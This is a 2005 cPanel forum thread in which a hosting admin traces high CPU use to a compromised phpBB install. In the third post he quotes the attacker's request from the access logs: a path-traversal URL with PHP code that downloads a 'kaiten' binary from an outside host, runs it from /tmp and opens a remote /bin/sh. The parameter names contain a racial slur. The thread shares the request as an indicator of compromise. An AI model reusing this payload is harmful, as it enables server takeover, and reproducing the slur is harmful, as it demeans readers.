The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Bash/Kai Crap

Discussion in 'General Discussion' started by adivity, Jun 8, 2005.

  1. adivity

    adivity Member

    Joined:
    Jul 6, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    Hey,

    Over the course of the last few weeks, a particular account on one our servers has been sending the server cpu usage to 100% and making the server crawl.

    In TOP the service name is showing up as "kai" and the command is showing as "-bash". The account owner doesnt know what it is or where its from and we cant seem to figure it out either.

    Does anyone have any ideas as to what it is and why its sending the cpu usage to 100%?


    Thanks.
     
  2. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Look into the log file:
    tail -f /var/log/messages
     
  3. adivity

    adivity Member

    Joined:
    Jul 6, 2004
    Messages:
    16
    Likes Received:
    0
    Trophy Points:
    1
    I found it. uhg.

    Turns out the client was running phpBB and while she was logged in as an admin on phpBB, someone grabbed her session ID. They then used an exploit in phpBB to do grab a file from a remote server and execute it. The file itself is a stored proceedure virus.

    Were trying to find out what it actually did to the system right now.

    If any of you see a bash process called "kai" in top or in ps -ef, then the first place to look would be access logs for the user its running under. You will probably see a http request that looks like this:

    /forum/admin/admin_styles.php?mode=addnew
    &install_to=../../../../../../../../../../../../../../../../../../../tmp
    &sid=7cffad407438a8df03468d0329435865
    &niggaip=3423673
    &niggaport=23532
    &nigga=$a=fopen(\%22http://mitglied.lycos.de/k11234/kaiten\%22,\%22r\%22);$b=\%22\%22;while(!feof($a)){$b%20.=%20fread($a,200000);};fclose($a);$a=fopen(\%22/tmp/.sesss_\%22,\%22w\%22);fwrite($a,$b);fclose($a);chmod(\%22/tmp/.sesss_\%22,0777);system(\%22/tmp/.sesss_%20\%22.$_REQUEST[niggaip].\%22%20\%22.$_REQUEST[niggaport].\%22%20-e%20/bin/sh\%22);

    Hope this helps someone. If anyone knows anything else about this, or the effects it has on
    the server, please let me know.
     
  4. webignition

    webignition Well-Known Member

    Joined:
    Jan 22, 2005
    Messages:
    1,880
    Likes Received:
    0
    Trophy Points:
    36
    You may also want to take a look at /home/username/.bash_history to check for any obvious signs that this is a shell-initiated process and, if so, it it may possilbly be due to an SSH compromise.

    To be honest I can't say if this is the right direction in which to head, however it would be one of the first things I'd check.
     
  5. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    There are many things you can do to secure your server, other than just looking into files. It is very crucial to protect and secure your server, otherwise, hackers and spammers will be very happy to use every drop of resource on your server.
     
Loading...

Share This Page